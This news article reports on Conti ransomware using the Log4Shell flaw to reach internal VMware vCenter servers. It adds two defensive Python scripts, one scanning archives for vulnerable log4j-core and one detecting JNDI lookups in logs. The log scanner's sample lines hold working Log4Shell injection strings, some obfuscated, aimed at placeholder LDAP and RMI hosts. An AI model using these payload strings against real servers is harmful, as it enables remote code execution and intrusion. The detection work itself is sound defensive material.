May 27, 2022
The Conti Ransomware Exploits Log4j Vulnerability To Compromise VMware vCenter Systems

The Conti ransomware operation is using the critical Log4Shell exploit to gain rapid access to internal VMware vCenter Server instances and encrypt virtual machines.

The gang wasted no time adopting the new attack vector, making it the first "top-tier" ransomware operation to weaponize the Log4j flaw.

The Vulnerable vCenter Is In The Crosshairs

On December 9, 2021, a proof-of-concept (PoC) exploit for CVE-2021-44228, also known as Log4Shell, was made public.

A day later, mass internet scanning began, with multiple attackers searching for vulnerable systems. Cryptocurrency miners, botnets, and a new ransomware strain named Khonsari were the first to exploit the flaw.

By December 15, the threat actors using Log4Shell had grown to include state-backed hackers and initial access brokers, who typically sell network access to ransomware groups.

Conti, one of the largest and most prolific ransomware groups today, took an early interest in Log4Shell, identifying it as a potential attack vector on Sunday, December 12.

The gang began scanning for new victims the next day, with the objective of moving laterally to VMware vCenter networks for extortion and disruption, according to Advanced Intelligence (AdvIntel), which shared its findings with BleepingComputer.

Dozens of vendors have been affected by Log4Shell and have rushed to patch their products or provide customers with workarounds and mitigations. VMware is one of them, with 40 vulnerable products on its list.

While VMware has provided mitigations or fixes, a patch for the affected vCenter versions has yet to be released.

Although vCenter servers are not usually exposed to the internet, there are scenarios in which an attacker can take advantage of the flaw:

“A malicious actor with network access to an impacted VMware product may exploit this issue to gain full control of the target system and/or perform a denial of service attack” – VMware

According to AdvIntel, Conti ransomware operators showed interest in using the public Log4Shell exploit in their operations.
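VMware's statement above applies only when a vulnerable log4j-core is actually present on the appliance, and products like vCenter ship many jars nested inside wars, so a search by file name can miss copies. As an added example (written for this article; it is not VMware's or AdvIntel's code and is not a substitute for VMware's own workaround instructions), the following Python walks a directory tree, opens every jar/war/ear, reads the log4j-core version from its pom.properties and checks whether JndiLookup.class is still shipped, descending into nested archives. The directory layout, jar names and placeholder class bytes are constructed for the demo; the version rule follows Apache's advisory for CVE-2021-44228.

```python
import io
import os
import re
import tempfile
import zipfile

# The class that performs the JNDI lookup. Apache lists deleting it from log4j-core as a
# mitigation where upgrading is not immediately possible, so its absence matters as much
# as the version string.
JNDI_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
ARCHIVE_SUFFIXES = (".jar", ".war", ".ear", ".zip")

def version_vulnerable_to_log4shell(version):
    """CVE-2021-44228 affects log4j-core 2.x up to 2.14.1, except the 2.12.2 and 2.3.1
    backport fixes. Returns None when the version is unknown (review manually)."""
    if version is None:
        return None
    nums = [int(p) for p in re.findall(r"\d+", version)[:3]] + [0, 0, 0]
    major, minor, patch = nums[:3]
    if major != 2 or (minor, patch) >= (15, 0):
        return False
    return not ((minor == 12 and patch >= 2) or (minor == 3 and patch >= 1))

def _log4j_core_version(zf):
    if POM_PROPS in zf.namelist():
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                return line.split("=", 1)[1].strip()
    return None

def _scan_archive(zf, path):
    """Yield a finding if this archive is log4j-core, then descend into nested archives."""
    names = zf.namelist()
    version = _log4j_core_version(zf)
    has_jndi = JNDI_CLASS in names
    if version is not None or has_jndi:
        vuln = version_vulnerable_to_log4shell(version)
        # Flag when the lookup class is present and the version is vulnerable or unknown.
        yield {"path": path, "version": version, "jndi_lookup": has_jndi,
               "flagged": has_jndi and vuln is not False}
    for name in names:
        if name.lower().endswith(ARCHIVE_SUFFIXES):
            try:
                with zipfile.ZipFile(io.BytesIO(zf.read(name))) as inner:
                    yield from _scan_archive(inner, path + "!/" + name)
            except zipfile.BadZipFile:
                continue

def scan_tree(root):
    """Walk a directory tree and return findings for every archive, nested ones included."""
    findings = []
    for dirpath, _, filenames in os.walk(root):
        for fn in filenames:
            if not fn.lower().endswith(ARCHIVE_SUFFIXES):
                continue
            full = os.path.join(dirpath, fn)
            try:
                with zipfile.ZipFile(full) as zf:
                    rel = os.path.relpath(full, root).replace(os.sep, "/")
                    findings.extend(_scan_archive(zf, rel))
            except zipfile.BadZipFile:
                continue
    return sorted(findings, key=lambda f: f["path"])

def _make_jar(version, include_jndi):
    """Constructed stand-in for log4j-core with the same layout (not the real library)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"artifactId=log4j-core\nversion={version}\n")
        if include_jndi:
            zf.writestr(JNDI_CLASS, b"\xca\xfe\xba\xbe")  # placeholder bytes, not bytecode
    return buf.getvalue()

def run_demo():
    """Build a constructed tree with four log4j-core variants, scan it, return the findings."""
    with tempfile.TemporaryDirectory() as root:
        lib, webapps = os.path.join(root, "lib"), os.path.join(root, "webapps")
        os.makedirs(lib)
        os.makedirs(webapps)
        samples = {
            "log4j-core-2.14.1.jar": _make_jar("2.14.1", True),             # unpatched: flagged
            "log4j-core-2.14.1-mitigated.jar": _make_jar("2.14.1", False),  # class removed: clean
            "log4j-core-2.17.1.jar": _make_jar("2.17.1", True),             # upgraded: clean
        }
        for name, data in samples.items():
            with open(os.path.join(lib, name), "wb") as f:
                f.write(data)
        # An old copy bundled inside a .war, which a search by file name would miss.
        war = io.BytesIO()
        with zipfile.ZipFile(war, "w") as wz:
            wz.writestr("WEB-INF/lib/log4j-core-2.11.2.jar", _make_jar("2.11.2", True))
        with open(os.path.join(webapps, "ui.war"), "wb") as f:
            f.write(war.getvalue())
        return scan_tree(root)

if __name__ == "__main__":
    for finding in run_demo():
        print(finding)
```

Pointing scan_tree at an appliance's application directories gives one line per log4j-core copy with its version, whether the lookup class is present, and whether it is flagged. A copy that reports a fixed version but still carries JndiLookup.class is expected (upstream hardened the class rather than deleting it); a copy with the class removed is the documented workaround and is not flagged regardless of version.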

Using Log4Shell To Move Laterally

According to the report shared with BleepingComputer, “this is the first time this vulnerability entered the radar of a major ransomware group.”

“The current exploitation led to multiple use cases through which the Conti group tested the possibilities of utilizing the Log4J exploit” – AdvIntel

While most defenders focus on blocking Log4Shell attacks against internet-facing systems, the Conti ransomware campaign shows how the flaw can be used to target internal systems that may not receive the same attention.

According to the researchers, Conti affiliates had already gained access to the target networks and used vulnerable Log4j hosts to reach vCenter servers.

This indicates that Conti attackers used a different initial access vector (RDP, VPN, email phishing) to breach the network and are now moving laterally within it using Log4Shell.
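Because the attacker is already inside, the JNDI lookup strings land in the logs of internal hosts (web, application and vCenter access logs) rather than at the perimeter. As an added example, not taken from the article or from AdvIntel's report, this Python scans log lines for Log4Shell lookup strings, first collapsing the nested-lookup obfuscation (`${lower:j}`, `${upper:n}`, `${env:X:-j}`, `${::-j}`) that defeats a plain search for `${jndi:`. The log lines are constructed for the demo and the IP addresses are placeholders.

```python
import re

# Constructed sample access-log lines (not real traffic). Lines 3-5 carry JNDI lookup strings;
# lines 4 and 5 use nested-lookup obfuscation seen in the wild to evade naive "${jndi:" matching.
SAMPLE_LOG_LINES = [
    '10.0.0.5 - - [12/Dec/2021:10:01:02 +0000] "GET /ui/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.7 - - [12/Dec/2021:10:02:11 +0000] "GET /ui/?x=${sys:java.version} HTTP/1.1" 200 0 "-" "curl/7.68.0"',
    '10.0.0.9 - - [12/Dec/2021:10:03:15 +0000] "GET /ui/ HTTP/1.1" 200 512 "-" "${jndi:ldap://10.0.0.9:1389/a}"',
    '10.0.0.9 - - [12/Dec/2021:10:03:16 +0000] "GET /ui/ HTTP/1.1" 200 512 "-" "${${lower:j}${upper:n}di:${lower:rmi}://10.0.0.9:1099/a}"',
    '10.0.0.9 - - [12/Dec/2021:10:03:17 +0000] "GET /ui/?x=${${env:NOPE:-j}ndi:ldap://10.0.0.9:1389/b} HTTP/1.1" 400 0 "-" "-"',
]

# Wrapper lookups attackers use to hide the payload: ${name:-default} (also ${::-x}),
# ${lower:x} and ${upper:x}. Each collapses to its literal text.
_DEFAULT_RE = re.compile(r"\$\{[^${}]*:-([^${}]*)\}")
_LOWER_RE = re.compile(r"\$\{lower:([^${}]*)\}", re.IGNORECASE)
_UPPER_RE = re.compile(r"\$\{upper:([^${}]*)\}", re.IGNORECASE)
# Protocols Log4j's JndiLookup hands to JNDI; the host:port is the attacker infrastructure to hunt for.
_JNDI_RE = re.compile(
    r"\$\{\s*jndi\s*:\s*(ldaps?|rmi|dns|iiop|corba|nds|http)\s*:\s*//([^/}\s]+)", re.IGNORECASE
)

def normalize_lookups(text, max_rounds=10):
    """Collapse innermost wrapper lookups repeatedly until the text stops changing."""
    for _ in range(max_rounds):
        new = _DEFAULT_RE.sub(lambda m: m.group(1), text)
        new = _LOWER_RE.sub(lambda m: m.group(1).lower(), new)
        new = _UPPER_RE.sub(lambda m: m.group(1).upper(), new)
        if new == text:
            break
        text = new
    return text

def find_jndi_lookups(line):
    """Return [(scheme, host_port), ...] for every JNDI lookup in the line after de-obfuscation."""
    norm = normalize_lookups(line)
    return [(m.group(1).lower(), m.group(2)) for m in _JNDI_RE.finditer(norm)]

def scan_log(lines):
    """Return [(line_number, hits), ...] for the lines that carry a JNDI lookup."""
    hits = []
    for number, line in enumerate(lines, 1):
        found = find_jndi_lookups(line)
        if found:
            hits.append((number, found))
    return hits

if __name__ == "__main__":
    for number, found in scan_log(SAMPLE_LOG_LINES):
        for scheme, target in found:
            print(f"line {number}: JNDI {scheme} lookup pointing at {target}")
```

The normalization loop matters more than the final pattern: a rule that only matches the literal `${jndi:` misses lines 4 and 5 entirely, while the collapsed form exposes the scheme and the callback host:port, which is the indicator to pivot on across other internal hosts' logs and firewall records.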

Conti, the successor to the notorious Ryuk, is a Russian-speaking operation that has been in the ransomware business for years.

The group is behind hundreds of attacks; its data leak site alone lists over 600 victim companies that did not pay a ransom. Many others paid the actor to have their data decrypted and therefore do not appear on that list.

According to Group-IB, roughly 30% of ransomware victims choose to pay in order to recover their data using the attackers' decryption tool.

The Australian Cyber Security Centre (ACSC) recently issued a warning about Conti ransomware attacks against multiple organizations in the country. Electricity provider CS Energy was one of the victims.

Conti also hit Frontier Software, a payroll software provider used by the Australian government, exposing the personal information of thousands of government employees.

BleepingComputer also recently reported that the gang hit McMenamins, a brewery and hotel chain operating in Oregon and Washington, U.S. Conti ransomware has been active under this name since June 2020, and AdvIntel reports that the gang has extorted more than $150 million from its victims in the last six months.
